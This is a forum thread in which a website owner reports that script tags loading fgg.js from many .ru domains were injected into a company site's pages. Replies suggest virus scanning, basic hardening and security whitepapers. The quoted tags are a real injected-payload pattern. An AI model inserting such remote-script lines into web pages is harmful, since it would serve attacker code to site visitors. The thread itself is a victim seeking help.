Dear All,

I face a strange problem. All of sudden in our company website, the below script gets included automatically the end of the body tag. i.e, above </body> tag. Any idea of how to rectify this problem? Is this some kinda virus ? Do you know any sites that has the solution <script src=http://www.4cnw.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.bnrc.ru/fgg.js></script><script src=http://www.keje.ru/fgg.js></script><script src=http://www.90mc.ru/fgg.js></script><script src=http://www.keec.ru/fgg.js></script><script src=http://www.nudk.ru/fgg.js></script><script src=http://www.bnrc.ru/fgg.js></script><script src=http://www.jvke.ru/fgg.js></script><script src=http://www.gb53.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.keec.ru/fgg.js></script><script src=http://www.90mc.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.adwr.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script><script src=http://www.rrcs.ru/fgg.js></script>

your thinking is right...
i think its all because of one virus called JavaScript malware.....
scan your all web pages with anti virus scanner and find what is the exact virus.....
find the source of it...

OOPS ..the experts exchange link needs a paid sign up... But the pdf link was useful...but too technical for me and made me a bit scary of the vulnerabilities....Any ways thankz so much

do this first as first aid:
• Do not use the firewall for authentication: All http services in the intranet should employ authentication mechanisms on their own.
• Change all default passwords on home appliances: Authentication is useless if the password is known.
• Disable JavaScript: Enable JavaScript only for trusted pages that really require JavaScript to function.
This does not provide protection for the case that one of this pages was victim of an XSS [2]
attack, but it reduces the attack surface significantly.

check these:
References
[1] Jesse Burns. Cross site reference forgery - an introduction to a common web application weakness.
Whitepaper, https://www.isecpartners.com/documents/XSRF Paper.pdf, 2005.
[2] David Endler. The evolution of cross-site scripting attacks. Whitepaper, iDefense Inc., http://
www.cgisecurity.com/lib/XSS.pdf, May 2002.
[3] Jeremiah Grossman. Javascript malware, port scanning, and beyond. Posting to the websecurity
mailinglist, http://www.webappsec.org/lists/websecurity/archive/2006-07/
msg00097.html, July 2006.
[4] Jeremiah Grossman and TC Niedzialkowski. Hacking intranet websites from the outside. Talk
at Black Hat USA 2006, http://www.blackhat.com/presentations/bh-usa-06/
BH-US-06-Grossman.pdf, August 2006.

This article has been dead for over six months. Start a new discussion instead.